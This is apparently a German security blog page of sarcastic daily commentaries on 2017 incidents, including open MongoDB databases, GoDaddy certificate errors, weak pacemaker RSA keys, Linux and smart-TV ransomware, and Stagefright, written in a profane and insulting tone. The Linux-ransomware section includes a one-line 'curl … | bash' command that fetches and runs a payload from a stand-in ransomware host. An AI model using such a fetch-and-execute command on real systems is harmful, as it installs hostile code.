Datenschutz des tages

Könnt ihr euch noch erinnern, als no-SQL-datenbanken unter anderem als großer fortschritt gesehen worden, weil da keine SQL-injection möglich ist und die datenbanken deshalb viel sicherer sind?

Wenn zum ausgleich ACHTUNDSECHZIG VERDAMMTE PROZENT der installazjonen des populären no-SQL-datenbankdingens „mongoDB“ ohne passwortschutz offen ins internetz gestellt werden, nützt das freilich wenig.

Und hej, ihr ganzen idjoten da draußen, die ihr überall für ein paar dinge noch wertloser als glasperlen eure daten eingebt: so „viel“ respekt hat man im jahre 2017 vor dem (gesetzlich vorgeschriebenen) datenschutz, dass man sich traut, eine datenbank nicht einmal mit einem verdammten passwort abzusichern. Und daran wird sich so lange nix ändern, bis fahrlässige datenschleuderei endlich einmal zu weitgehenden haftungspflichten führt. Ich wäre ja für so rd. fünfhundert euro pro betroffener person. Aber das ist mit euren scheißp’litikern, die immer vom „datenreichtum“ und vom „rohstoff der zukunft“ sprechen, nicht zu machen, dass sie für ein mindestmaß an sorgfalt beim umgang mit daten sorgen. Das darf das internetz gern ein rechts- und rechtefreier raum sein.

Auch weiterhin viel spaß an den überall völlig konsekwenzenlos zugesagten datenschutz, gern auch mit heiteren siegeln! Die liste wäxt und wäxt und wäxt.

TLS des tages

„GoDaddy“ hat 8850 TLS-zertifikate ohne anständige domainüberprüfung rausgegeben. [Link geht zu guhgell groups, skriptalarm!] Die sind als CA in jedem brauser eingetragen, und es ist wohl möglich gewesen, sich da ein TLS-zertifikat für… sagen wir mal… guhgell, die deutsche bank, meikrosoft oder etwas ähnliches ausgeben zu lassen.

Our system automatically checks for the presence of that code via an HTTP and/or HTTPS request to the website. If the code is found, the domain control check is completed successfully. Prior to the bug, the library used to query the website and check for the code was configured to return a failure if the HTTP status code was not 200 (success). A configuration change to the library caused it to return results even when the HTTP status code was not 200. Since many web servers are configured to include the URL of the request in the body of a 404 (not found) response, and the URL also contained the random code, any web server configured this way caused domain control verification to complete successfully

Aber hej, „godaddy“ sagt, dass das nicht ausgebeutet wurde. Also nicht so, dass die es gemerkt hätten…

Ich wünsche euch allen auch weiterhin viel spaß beim festen glauben an die bekweme sicherheit durch das kleine schlösschen im brauser! TLS ist schon lange tot.

via @benediktg5@twitter.com

Security des tages

Ein Angreifer kann zum Beispiel den Takt des Herzschrittmachers manipulieren oder den Defibrillator auslösen

Tolle sache, so ein herzschrittmacher, der ständig über funk erreichbar ist, weil er ja ständig mit der mit dem internetz verbundenen basisstazjon labern muss. So ein 24-bit-RSA-schlüssel ist da für die absicherung völlig ausreichend. Da die meisten menschen nach durchlaufen der BRD-schulbildung matematische und informatische analfabeten sind und deshalb nicht wissen können, was das wirklich bedeutet, hier eine ganz kurze erklärung: Der kleinere der beiden primfaktoren ist maximal 2^12, also 4096. Zum kräcken muss man alle primzahlen im Intervall von 2 bis 4096 durchprobieren. Das sind, moment…

$ primes 2 4096 | wc -l
564
$ _

…das sind 564 auszuprobierende divisionen, um die verschlüsselung zu knacken. Wenn man gerade keinen kompjuter zur hand hat und sich wegen akuter langeweile von stumpfsinnigen tätigkeiten nicht abschrecken lässt, kann man das sogar mit bleistift und papier angehen, und es wird nicht übermäßig lange dauern. Wenn man einen kompjuter benutzt, hat man den kräck unmittelbar. Der linuxbefehl für den kräck lautet factor, und er wird nur ein paar millisekunden brauchen. Oder ums etwas genauer zu sagen, er braucht auf meinem rechenschrott…

$ time factor 16063703
16063703: 3989 4027

real	0m0.034s
user	0m0.000s
sys	0m0.000s
$ _

…nur 34 millisekunden. Diese vorgebliche kryptografie ist eine dermaßen schlechte idee, dass man es kaum noch beschreiben kann. Ich nenne das beihilfe zum mord. Das wird schiefgehen. Das muss schiefgehen. Schlechte kryptografie, eine „krüpplografie“, wie ich das zu nennen pflege, bringt menschen um. Und wer glaubt, dass es jetzt gar nicht mehr schlimmer ginge, ein bisschen englisch kann und nichts gegen einen besuch beim zwitscherchen hat, sollte sich noch ein bisschen mehr zu diesem internetz-der-dinge-horror anschauen. 😦

Freut ihr euch eigentlich auch schon auf die ersten erpressungstrojaner, die über herzschrittmacher laufen? Glaubt mir, die meisten menschen werden unter todesangst sehr zahlungsbereit und werden kreative wege finden, auch das geld für unverschämt hohe forderungen irgendwie aufzutreiben… 👿

Wenn euch doch nur jemand vor diesem internetz der dinge gewarnt hätte!

Und noch eine datenschleuder

Die elbfilharmonie in hamburg hat ein paar daten veröffentlicht:

Aufgrund einer Schwachstelle konnte im Grunde jedermann auf bereits gekaufte Tickets zugreifen und diese einfach herunterladen. Die Elbphilharmonie prüft derzeit, ob und wie oft das passiert ist

Aber wollen wir mal froh sein, dass die elbfilharmonie inzwischen eröffnet wurde… :mrgreen:

Und angesichts der tatsache, dass jede, jeder und jedes bewohner*in hamburgs da einige hundert øre seiner steuergelder drin versenkt hat, während auch in hamburg die schulen vor sich hin verschimmeln und zeugnis davon ablegen, worauf es der p’litkaste in der BRD wirklich ankommt, ists doch nur gerecht, dass es die eintrittskarten kostenlos gibt. 😈

Und nein, die grob fahrlässige datenschleuderei — völlig offen veröffentlichte eintrittskarten, die ohne besonderes häcking und ohne vertiefte kenntnisse von jedermann und jedefrud durch ändern von URI-paramtern runtergeladen werden können — wird keinerlei konsekwenzen haben. Insbesondere wird es nicht zu einer haftung gegenüber menschen kommen, die eine der von der elbfilharmonie durch programmierpfusch selbst ausgegebenen, doppelten eintrittskarten für viel geld (gern auch mehr als tausend øre, ist ja was fürs volk) irgendwo gekauft haben. Sind ja nicht diese gefährlichen fäjhknjuhs, die man so sehr mit allen mitteln bekämpfen muss, und sei es, dass man scheiß-aufs-grundgeschwätz eine zensur durchsetzt; es ist ja nur die ganz normale scheiß-auf-die-kunden-verantwortungslosigkeit beim betreiben von geschäften im internet. Wer davon betroffen ist, bleibt in der BRD immer auf seinem schaden sitzen. Denn sonst „wird“ die BRD noch zum digitalen entwicklungsland, und das wollen wir doch nicht:mrgreen:

Ach ja, eines noch: programmiert wurde das übrigens von denen hier:

Als inhabergeführte Softwaremanufaktur entwickelt spiritec ein breit gefächertes Angebot an hochwertigen Softwarelösungen und maßgeschneiderten Produkten

Weia, „manufaktur“. Ich will mal hoffen, dass die in wirklichkeit modernere produkzjonsverfahren als spätmittelalterliche handarbeitsteilung haben, so irgendwas mit tastaturen, kompjutern und datenbanken. Hirnlösendes reklamegeschwätz von euren feinden, den reklameheinis! (Immerhin haben sie nicht „manufactur“ geschrieben, um es noch „hipper“ aussehen zu lassen…)

Aber was ich eigentlich sagen will: Die scheinen ja geradezu ein abo auf projekte mit dummer staatskohle abgeschlossen zu haben! Vermutlich haben sie gute freunde in p’litik und verwaltung, denen sie öfter mal ein küsschen geben. Oder auch zwei. :mrgreen:

(Davon, dass diese webhonks auf ihrer tollen unternehmenswebseit keine altmodischen links mehr setzen und dass man deshalb ohne javascript nix mehr wirksam anklicken kann, will ich gar nicht erst anfangen. Die machen bestimmt auch barrjerefrei und sicherheit und blahblahblah… lieber insolvenzverwalter, walte deines amtes!)

Was habe ich darauf gewartet!

Unter linux gibt es kein ausreichenden softwäjhr-angebot? Das ändert sich. ENDLICH gibt es erpressungstrojaner auch für linux-sörver!!!1!elf!!

Bleibt nur eine offene frage: das ding braucht offensichtlich root-rechte, um sich über GRUB melden zu können. Wie kann man einem linux-sörver einen trojaner unterjubeln. Ich sehe da (bei debianoiden systemen) folgende möglichkeiten:

  • PPAs wurden gepwnt. Der admin ist eine schlafmütze und hat PPAs auf einem sörver eingetragen, die dann halbautomatisch sein system mitwarten. (Die alternative ist es, kwelltextpakete nach abgleich der prüfsumme selbst zu kompilieren.) Das bildschirmfoto zeigt einen unbuntu-GRUB, deshalb scheint mir ein PPA gar nicht unwahrscheinlich zu sein.
  • Fiese debian-fehler, die bei der unnötigen umstellung des paketmänätschments aufgetreten sind, wurden ausgebeutet.
  • Über irgendeine kombinazjon verschiedener „kleiner“ fehler, die ein admin aus furcht vor problemen auch mal völlig ungefixt lässt, kam es zur rechteausweitung und zur ausführung von kohd mit root-rechten. Etwa, wenn es durch einen fehler in websörver oder in einer darauf laufenden anwendung möglich geworden ist, kohd mit den rechten des websörvers auszuführen, um dann dirty COW zu benutzen, um root zu kriegen.

Wie es auch sei, eines wirkt dumm an diesem trojaner: warum handelt es sich um die linux-variante eines windohs-schädlings. Gerade ein un*xoides betrübssystem macht es im grunde sehr einfach, einen derartigen trojaner zu schreiben. Sogar die implementazjon in einem shellskript wäre bekwem möglich. Kurz: die leute, die das gemacht haben, sind vermutlich ein bisschen dumm. Dabei braucht nicht einmal eine temporäre datei (die bei einer analyse den privaten schlüssel verraten und eine entschlüsselung ermöglichen könnte) auf einem datenträger abgelegt zu werden, es gibt doch pipes:

# curl -L http://get.ransomware.example.com/?for=some_id | bash

Un*xoide betrübssysteme haben eben ihre ganz eigene eleganz… :mrgreen:

Aber: welche schlafmütze von admin hat keine bäckups vom sörver? Oh… 😦

Aber die jagd ist eröffnet. Inzwischen haben ja doch so einige ganz normale anwender ein linux-system als desktoprechner, und viele von ihnen dürften sich sehr sicher fühlen, weil sie ja nicht dieses gefährliche windohs benutzen und deshalb alle vorsicht fahren lassen… da wird die überraschung dann böse, wenn beim hochfahren auf dem bildschirm „gib mir bitcoin, oder du siehst deine daten nie wieder“ steht.

Lasst euch kein antivirus-schlangenöl für linux aufschwatzen! Die scheiße funkzjoniert schon unter windohs nicht und reißt tendenzjell eher noch größere sicherheitslöcher auf. Lernt lieber etwas über den kompjuter, den ihr benutzt, klickt nicht auf alles, was sich anklicken lässt und seht zu, dass ihr immer ein aktuelles system habt. Die beste antivirus-softwäjhr ist das gehirn.

Und nochmal und wieder einmal: ändräut des tages

Die gefährlichste Schwachstelle (CVE-2017-0381) klafft abermals in Multimedia-Komponenten von Android – die sogenannten Stagefright-Lücken machen Google schon seit Juni 2015 zu schaffen. Für einen erfolgreichen Übergriff soll etwa der Empfang einer manipulierten MMS genügen. Angreifer können so ganze Geräte kompromittieren, warnt Google

Wohl dem, der ein wischofon hat, das auch sicherheitsaktualisierungen kriegt — die meisten haben ein wischofon, dass sie mit sicherheitslöchern von der ungefähren größe des sonnensystemes weiterbenutzen. Auch fürs onlein-bänking. Und wenns dann demnächst mal so richtig in die hose geht, wird das geschrei wieder groß sein: warum hat euch keiner gewarnt.

Und übrigens: lasst euch nicht von scheißjornalisten ins gehirnchen ficken, die dafür bezahlt werden, dass sie werbeplätze vermarktbar machen; natürlich auch die werbeplätze für die ganzen wischofon-klitschen. Man muss nicht unbedingt MMS nutzen, um ein wischofon zu haben, dass über stagefright gepwnt werden kann. Das geht überall, wo man videos einbetten kann. Zum beispiel über euer lieblingschnatterprogramm. Oder im webbrauser. Oder in eurer mäjhlsoftwäjhr, wenn ihr dort HTML-mäjhl als HTML anzeigen lasst. Oder in einer reklame in einem eurer kostenlosen äppchen. Bei überteuerten transportweg MMS hat ein angreifer nur den vorteil, dass das video gar nicht erst sichtbar dargestellt werden müsste — aber keiner von euch denkt sich etwas bei einem ganz normalen reklamebanner, der irgendwo dargestellt wird. Also glaubt nicht, dass ihr mit euren wischofonen sicher seid, weil ihr MMS nicht nutzt.

(Oh, du machst keine fernkontoführung mit deinem wischofon? Das ist gut. Und was sagst du dazu, wenn eines tages die kriminalpolizei bei dir vor der tür steht, weil auf deinem wischofon so genannte¹ „kinderpornografie“ gehostet wurde, wenn deshalb bei den ermittlungen auch dein arbeitsplatz durchsucht wird und wenn du selbst nach deinem keineswegs sicheren freispruch vor gericht in deinem gesamten umfeld immer wieder in den verdacht des „kinderfickers“ kommst und die völlige verachtung erfährst, so dass du es niemals wieder kitten kannst? Nein, so etwas läuft meines wissens nach noch nicht. Aber leute, die sich selbst verbergen müssen, um nicht in den scheißknast zu gehen, machen alles mögliche, um selbst verborgen zu bleiben. Botnetze aus gepwnten geräten aller art kann man einfach für ein bisschen bitcoin im darknet mieten, und das scheint ein gutes geschäft zu sein. Es ist absehbar, dass illegale dinge irgendwann massenhaft auf kompjutern anderer leute gehostet werden, wenn man diese nur leicht pwnen kann. Auch und vor allem auf wischofonen. So ein wischofon ist die sicherheits-blauäugigkeit der neunziger jahre kombiniert mit der organisierten internetz-kriminalität der zehner jahre und damit unfassbar blöd.)

Ihr wart alle jeden verdammten tag gewarnt genug. Ihr seid hirnlos, wenn ihr euch für ein paar bunte bilder, etwas bekweme benutzung und sonstige glasperlen von legalbetrügerischen scheißkaufleuten einen kompjuter andrehen lasst, auf dem ihr wegen gezielter, vorsätzlicher und mit hohem aufwand betriebener technikverhinderung nicht die softwäjhr laufen lassen könnt, die ihr drauf laufen lassen wollt. Könnt euch ja ein neues kaufen! Doof genug dafür seid ihr!

Wenns internetz im händi ist, ists gehirn im arsch.

Ach! 😦

¹Die darstellungen sexuell missbrauchter kinder sind keine pornografie, sondern darstellungen sexuell missbrauchter kinder. Pornografie wird von erwaxenen menschen freiwillig (und wegen des geldes) gemacht — also ungefähr so freiwillig wie arbeit. Lasst euch niemals ins gehirn ficken und fragt euch bei jedem wort, wie es das denken formen soll. Die jornalistische verharmlosung im wort „kinderpornografie“ ist widerlich.

Ändräut des tages

Android ist für 523 und damit die mit Abstand größte Zahl von Sicherheitslücken verantwortlich, die im Jahr 2016 bei einem Softwareprodukt bekannt wurden

Und hier noch einer für die leute, die an ihrem wischofon rumfingern und immer fläsch für das übelste sicherheitsproblem halten:

Als Produkte stehen die Linux-Distributionen Debian (319 Lücken) und Ubuntu (278 Lücken) sogar noch vor dem Adobe Flash Player, der sich mit 266 Lücken den vierten Platz sicherte

Hej, unbuntu, da geht aber noch was nach oben!

Im gegensatz zum langsam verrottenden wischofon, das in der waste economy der händigetriebenen enthirnung keine sicherheitsaktualisierungen mehr kriegt und sicherheitslöcher hat, in denen man ein ganzes sonnensystem verstecken könnte, gibts für fläsch wenigstens für jeden nutzer leicht installierbare aktualisierungen. Aber das hindert ja keinen der fläsch-für-total-gefährlich-halter daran, mit seinem wischofon onlein-bänking zu machen…

Wenns internetz im händi ist, ists gehirn im arsch.

Wenn so etwas vorm WM-endspiel käme!

Ihr wolltet „smarte“ glotzen?

Erpresser-Botschaft in Dauerschleife:
Smart TV von LG mit Ransomware infiziert

Bwahahahaha!

Wenn euch doch nur jemand vor der ganzen smartscheiße gewarnt hätte, nicht wahr? Auch weiterhin viel spaß mit euren ganzen smartdingern, ihr dumbasses!

Hej, eure autos werden demnächst auch alle noch viel „smarter“. Ich würde da den trojaner ja so machen, dass man das auto erst dann wieder abschließen kann, wenn man bezahlt hat. Aber ich bin ja auch kein richtiger verbrecher, der zynisch und menschenverachtend ist und dem es scheißegal ist, wie viele leute bei seinen nötigungen verrecken, solange er nur selbst seinen schnitt macht. „Wenn sie wieder die gewohnte bremswirkung haben möchten, zahlen sie jetzt ganz bekwem drei bitcoin, einfach hier hintäppen und schritt für schritt durch die zahlung führen lassen, während sie weiter auf der autobahn unterwegs sind. Eine reduzierung ihrer fahrgeschwindigkeit wird nach eingang der zahlung sofort wieder möglich sein“… :mrgreen:

Und wer glaubt, dass im falle eines falles ein guter alter reset hilft…

Ein Zurücksetzen des TV-Gerätes mit öffentlich dokumentierten Methoden soll das Problem nicht gelöst haben

…hat sich auch geschnitten. Zum ausgleich ist das in smartglotzen für dumbasses verbaute ändräut oft schon bei auslieferung so übel veraltet, dass man sich über ausgebeutete sicherheitslöcher nicht zu wundern braucht. Ich würde mich jedenfalls nicht darauf verlassen, dass man dafür immer erst eine äpp installieren muss.

The bullshit that means business…

So ein webbrauser auf einem kompjuter ist ja echt voll unsicher, aber da hat eine klitsche eine tolle lösung gefunden: einfach den brauser in die „cloud“ packen, und alles wird gut! Kostet auch nur zehn dollar im monat.

Mein armes bullschitt-o-meter muss sich nach genuss dieses tollen angebotes erstmal von seiner belastungsprobe erholen, und danach verstehe ich vielleicht sogar, was die mir wirklich anbieten wollen. Ist es ein konfigurierbarer, filternder proxysörver mit einem äppchen dazu, das einem die aufwändige konfigurazjon im brauser (eintragen einer IP-adresse) erspart? So für unfähige admins, die nicht wissen, wie man sich einen proxy aufsetzt, und für kompjuteranalfabetische webnutzer, die nicht wissen, wie man einen javascript-blocker und einen adblocker benutzt?

Cyber cyber des tages

Wenn das fliegen — das ja aus nicht nachvollziehbaren gründen immer noch billiger als das bahnfahren ist — doch einmal zu teuer ist, haben die ticketsysteme ein tolles funkzjonsmerkmal, nämlich die flugmöglichkeit auf kosten anderer leute. [Dauerhaft archivierte meldung]

Man brauche nicht einmal ausgeprägte Hacker-Qualitäten, um sich so Freiflüge zu besorgen […] Aber wo ist die Sicherheitslücke? Flugtickets verfügen in der Regel über einen sechsstelligen Buchungscode. Mehr nicht. „Buchungssystemen fehlt ein Sicherheitsmerkmal, das wir aus allen anderen Computersystemen kennen – und zwar das Passwort“, sagt Nohl. Sobald Passagiere einen Flug gebucht haben, wird ihnen diese sechsstellige Kombination mitgeteilt. Soll später die Buchung verändert werden, um einen Mietwagen ergänzt zum Beispiel, müssen Passagiere an keiner Stelle ein Passwort eingeben. Sie weisen sich mit ihrem Namen und diesem Code aus […] Automatisiert kann ein Hacker das in kürzester Zeit abfragen, der Computer fragt sozusagen immer wieder nach, ob er die richtige Kombination aus Großbuchstaben, Ziffern und Namen gefunden hat. Das Buchungssystem bejaht oder verneint – wird aber offenbar auch erstmal nicht stutzig, wenn diese Abfrage millionenfach vom selben Rechner aus geschieht […] Amadeus wirbt damit, dass ihre Systeme im Jahr 2015 insgesamt 747 Millionen Passagiere bedient haben. IT-Sicherheitsforscher Nohl zufolge, der das System seit Monaten analysiert hat, vergibt Amadeus pro Tag ein bis zwei Millionen Buchungscodes für Flugreisende. „Und wir wissen ziemlich genau, welche Nummern das sind, weil sie fortlaufend vergeben werden.“

Das ist ja wie weihnachten!

„Mit linux wär das nicht passiert“ des tages

Über eine manipulierte .crash-Datei könnte ein Angreifer beliebigen Python-Code mit den Rechten des angemeldeten Users zur Ausführung bringen. Mit einer Variante des Tricks könnte sich ein Angreifer sogar die Zustimmung des Users erschleichen, Code mit Root-Rechten auszuführen

Tolle programmierleistung bei unbuntu! Dass so etwas wie ein eval mit irgendwelchen daten immer eine gefährliche sache ist, ist nicht so schwer einzusehen. Und hej, es gibt kriminelle, die bereit sind, zehntausend dollar für einen ausbeutbaren fehler eines populären linux-desktopsystems hinzublättern. Da sage noch mal einer, für linux interessiert sich wegen der geringen verbreitung niemand. Wo gezahlt wird, haben sich noch immer ein paar leute gefunden, die sich auch bezahlen lassen…

Security des tages

Mac-Passwort lässt sich über Thunderbolt auslesen

Mit Hardware von der Stange kann ein Angreifer in rund 30 Sekunden das im Klartext vorliegende Passwort abgreifen und so Apples Festplattenverschlüsselung FileVault überwinden, um auf alle Daten zuzugreifen

Ich tippe auf eine vorsätzlich offen gelassene hintertür für die horch- und morddienste der vereinigten staaten eines teils von nordamerika. Wäre ja schlimm, wenn man verschlüsselte daten nicht lesen kann.

Schlangenöl des tages

Sicherheitspatches:
McAfee VirusScan Enterprise gefährdet Linux-Systeme

Na, wenn man mit linux schon — vor allem, weil es immer noch so wenig verbreitet ist, dass es sich für die verbrecher nicht lohnt — keine probleme mit schadsoftwäjhr hat, dann muss man sich doch wenigstens probleme und klaffende sicherheitlöcher durch irgendwelche schlangenöle gegen schadsoftwäjhr holen. Sonst würde einem ja was fehlen… :mrgreen:

Worauf haben wir denn alle sehnsuchtsvoll gewartet?

Richtig, auf eine vom W3C ausgearbeitete bluetooth-API für das „web of things“.

But at first: it will enable a web browser to contact the user’s connected devices such as smartphones, kettles, toasters, TVs, thermostats, heart rate monitors, and so on. Imagine a world where every web site can connect to devices near you – or on you

Natürlich handelt es sich um eine weitere von guhgell ersonnene träcking- und datenschnochelschnittstelle im webbrauser, die eine persönliche identifikazjon ermöglicht, kombiniert mit informazjonen direkt aus der privatsfäre (neben bewegungsträcking jetzt endlich auch mit puls, blutzuckerspiegel und zubereitetem essen). Und weil man das eben zu schnell überlesen hat: im webbrauser!

Na ja, spätestens wenn ein werbebanner von einer pressewebseit, die das abschalten des adblockers erzwingt, den herzschrittmacher umprogrammiert… 😦

Und überhaupt: gerade bereitet guhgell vor, seinen eigenen brauser viel viel „sicherer“ zu machen:mrgreen:

Danke, B.G., für den hinweis

Drei, zwei, eins, meins…

Ebay, dieser virtuelle garahschenflohmarkt, ist nicht TLS-verschlüsselt. Das heißt: fast nicht. Beim anmelden und auf den hilfeseiten [!] schon. Und das bedeutet, dass jemand, der den datenverkehr mitsnifft (na, offenes WLAN irgendwo) über die cookies die sitzung und das benutzerkonto einfach übernehmen kann und dann damit machen kann, was er will.

Und ich habe mich immer gewundert, warum gerade bei ebay so viel scheiße passiert.